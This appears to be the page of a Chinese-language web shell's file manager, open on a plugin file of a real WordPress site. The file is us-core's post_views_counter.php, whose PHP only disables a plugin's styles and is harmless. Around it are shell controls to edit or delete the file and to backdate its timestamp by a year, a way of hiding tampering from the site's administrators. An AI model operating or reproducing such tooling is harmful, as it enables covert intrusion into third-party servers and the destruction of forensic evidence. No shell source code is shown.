文件操作 - post_views_counter.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/us-core/plugins-support/post_views_counter.php
编辑文件内容
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Post Views Counter Support * * https://wordpress.org/plugins/post-views-counter/ */ if ( ! function_exists( 'us_pvc_enqueue_styles' ) ) { add_filter( 'pvc_enqueue_styles', 'us_pvc_enqueue_styles', 100 ); /** * Removing styles from the Post Views counter plugin * * @return bool */ function us_pvc_enqueue_styles() { if ( us_get_option( 'optimize_assets', 0 ) AND is_plugin_active( 'post-views-counter/post-views-counter.php' ) ) { return FALSE; } return TRUE; } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件